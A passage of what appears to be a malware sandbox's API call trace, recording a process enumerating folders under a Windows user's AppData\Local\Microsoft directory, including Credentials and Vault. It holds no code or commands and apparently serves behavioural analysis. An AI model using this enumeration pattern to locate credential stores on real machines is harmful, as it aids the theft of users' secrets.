ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3cefc6a2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6ec87d0d, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="InputPersonalization", cAlternateFileName="INPUTP~1")) returned 1 [0266.852] FindNextFileW (in: hFindFile=0x693750, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5b61023, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xf5b61023, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0xf5b61023, ftLastWriteTime.dwHighDateTime=0x1d7045f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="InstallAgent", cAlternateFileName="INSTAL~1")) returned 1 [0266.852] FindNextFileW (in: hFindFile=0x693750, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4137bbef, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2171b8e6, ftLastAccessTime.dwHighDateTime=0x1d86028, ftLastWriteTime.dwLowDateTime=0x2171b8e6, ftLastWriteTime.dwHighDateTime=0x1d86028, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0266.853] FindNextFileW (in: hFindFile=0x693750, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40f9be3f, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40f9be3f, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x40f9be3f, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Media Player", cAlternateFileName="MEDIAP~1")) returned 1 [0266.853] FindNextFileW (in: hFindFile=0x693750, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5781bc17, ftCreationTime.dwHighDateTime=0x1d7046d, ftLastAccessTime.dwLowDateTime=0x696efe32, ftLastAccessTime.dwHighDateTime=0x1d7046d, ftLastWriteTime.dwLowDateTime=0x696efe32, ftLastWriteTime.dwHighDateTime=0x1d7046d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office", cAlternateFileName="")) returned 1 [0266.853] FindNextFileW (in: hFindFile=0x693750, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b49234, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x84c1ec39, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84c1ec39, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneDrive", cAlternateFileName="")) returned 1 [0266.853] FindNextFileW (in: hFindFile=0x693750, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a11bc67, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x3a11cf49, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x3a11cf49, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook", cAlternateFileName="")) returned 1 [0266.853] FindNextFileW (in: hFindFile=0x693750, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PlayReady", cAlternateFileName="PLAYRE~1")) returned 1 [0266.853] FindNextFileW (in: hFindFile=0x693750, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb898985, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xb898985, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xb9574d8, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vault", cAlternateFileName="")) returned 1 [0266.853] FindNextFileW (in: hFindFile=0x693750, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xdd764542, ftLastAccessTime.dwHighDateTime=0x1d8598c, ftLastWriteTime.dwLowDateTime=0xdd764542, ftLastWriteTime.dwHighDateTime=0x1d8598c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0266.853] FindNextFileW (in: hFindFile=0x693750, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87ca06a1, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x87ca06a1, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x87ca06a1, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~2")) returned 1 [0266.853] FindNextFileW (in: hFindFile=0x693750, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d0c63cd, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x377dee7, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WINDOW~1")) returned 1 [0266.853] FindNextFileW (in: hFindFile=0x693750, lpFindFileData=0x19eef0 | out: lpFindFileData=0x19eef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d0c63cd, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x377dee7, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WINDOW~1")) returned 0 [0266.853] FindClose (in: hFindFile=0x693750 | out: hFindFile=0x693750) returned 1 [0266.854] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f178) returned 1 [0266.854] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f184) returned 1 [0266.863] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\.", nBufferLength=0x105, lpBuffer=0x19ec74, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft", lpFilePart=0x0) returned 0x2d [0266.864] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f134) returned 1 [0266.864] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft", nBufferLength=0x105, lpBuffer=0x19ec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft", lpFilePart=0x0) returned 0x2d [0266.864] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\", nBufferLength=0x105, lpBuffer=0x19ec10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\", lpFilePart=0x0) returned 0x2e [0266.864] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\*"), lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3a17d745, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x3a17d745, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6934d0 [0266.864] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3a17d745, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x3a17d745, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0266.864] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b2eec3b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x5b2eec3b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x5b2eec3b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CLR_v4.0", cAlternateFileName="")) returned 1 [0266.865] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x73c78cc8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x73c78cc8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x73c78cc8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CLR_v4.0_32", cAlternateFileName="CLR_V4~1.0_3")) returned 1 [0266.865] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x58717184, ftLastAccessTime.dwHighDateTime=0x1d82a22, ftLastWriteTime.dwLowDateTime=0x58717184, ftLastWriteTime.dwHighDateTime=0x1d82a22, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0266.865] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xe3af070a, ftLastAccessTime.dwHighDateTime=0x1d8598c, ftLastWriteTime.dwLowDateTime=0xe3af070a, ftLastWriteTime.dwHighDateTime=0x1d8598c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Feeds", cAlternateFileName="")) returned 1 [0266.865] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x430ec4ba, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xe3b0c8ff, ftLastAccessTime.dwHighDateTime=0x1d8598c, ftLastWriteTime.dwLowDateTime=0xe3b0c8ff, ftLastWriteTime.dwHighDateTime=0x1d8598c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Feeds Cache", cAlternateFileName="FEEDSC~1")) returned 1 [0266.865] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a17d745, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x3a184b86, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x3a184b86, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FORMS", cAlternateFileName="")) returned 1 [0266.865] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x809248a1, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0xc7db342, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xc7db342, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="GameDVR", cAlternateFileName="")) returned 1 [0266.865] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3cefc6a2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6ec87d0d, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="InputPersonalization", cAlternateFileName="INPUTP~1")) returned 1 [0266.865] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5b61023, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xf5b61023, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0xf5b61023, ftLastWriteTime.dwHighDateTime=0x1d7045f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="InstallAgent", cAlternateFileName="INSTAL~1")) returned 1 [0266.866] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4137bbef, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2171b8e6, ftLastAccessTime.dwHighDateTime=0x1d86028, ftLastWriteTime.dwLowDateTime=0x2171b8e6, ftLastWriteTime.dwHighDateTime=0x1d86028, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0266.866] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40f9be3f, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40f9be3f, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x40f9be3f, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Media Player", cAlternateFileName="MEDIAP~1")) returned 1 [0266.866] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5781bc17, ftCreationTime.dwHighDateTime=0x1d7046d, ftLastAccessTime.dwLowDateTime=0x696efe32, ftLastAccessTime.dwHighDateTime=0x1d7046d, ftLastWriteTime.dwLowDateTime=0x696efe32, ftLastWriteTime.dwHighDateTime=0x1d7046d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office", cAlternateFileName="")) returned 1 [0266.866] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b49234, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x84c1ec39, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84c1ec39, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneDrive", cAlternateFileName="")) returned 1 [0266.866] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a11bc67, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x3a11cf49, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x3a11cf49, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook", cAlternateFileName="")) returned 1 [0266.866] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PlayReady", cAlternateFileName="PLAYRE~1")) returned 1 [0266.866] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb898985, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xb898985, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xb9574d8, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vault", cAlternateFileName="")) returned 1 [0266.866] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xdd764542, ftLastAccessTime.dwHighDateTime=0x1d8598c, ftLastWriteTime.dwLowDateTime=0xdd764542, ftLastWriteTime.dwHighDateTime=0x1d8598c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0266.866] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87ca06a1, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x87ca06a1, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x87ca06a1, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~2")) returned 1 [0266.866] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d0c63cd, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x377dee7, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WINDOW~1")) returned 1 [0266.866] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0266.866] FindClose (in: hFindFile=0x6934d0 | out: hFindFile=0x6934d0) returned 1 [0266.867] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f4) returned 1 [0266.867] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f100) returned 1 [0266.867] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0", nBufferLength=0x105, lpBuffer=0x19ec5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0", lpFilePart=0x0) returned 0x36 [0266.867] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.867] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0", nBufferLength=0x105, lpBuffer=0x19ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0", lpFilePart=0x0) returned 0x36 [0266.867] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0\\", nBufferLength=0x105, lpBuffer=0x19ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0\\", lpFilePart=0x0) returned 0x37 [0266.867] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\clr_v4.0\\*"), lpFindFileData=0x19ee4c | out: lpFindFileData=0x19ee4c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b2eec3b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x5b2eec3b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x5b2eec3b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6934d0 [0266.868] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b2eec3b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x5b2eec3b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x5b2eec3b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0266.868] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b2eec3b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x5b2eec3b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x5b2eec3b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UsageLogs", cAlternateFileName="USAGEL~1")) returned 1 [0266.868] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b2eec3b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x5b2eec3b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x5b2eec3b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UsageLogs", cAlternateFileName="USAGEL~1")) returned 0 [0266.868] FindClose (in: hFindFile=0x6934d0 | out: hFindFile=0x6934d0) returned 1 [0266.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.868] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0\\.", nBufferLength=0x105, lpBuffer=0x19ebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0", lpFilePart=0x0) returned 0x36 [0266.868] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0_32", nBufferLength=0x105, lpBuffer=0x19ec5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0_32", lpFilePart=0x0) returned 0x39 [0266.868] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.869] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0_32", nBufferLength=0x105, lpBuffer=0x19ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0_32", lpFilePart=0x0) returned 0x39 [0266.869] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\", nBufferLength=0x105, lpBuffer=0x19ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\", lpFilePart=0x0) returned 0x3a [0266.869] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\clr_v4.0_32\\*"), lpFindFileData=0x19ee4c | out: lpFindFileData=0x19ee4c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x73c78cc8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x73c78cc8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x73c78cc8, ftLastWriteTime.dwHighDateTime=0x1d70074, 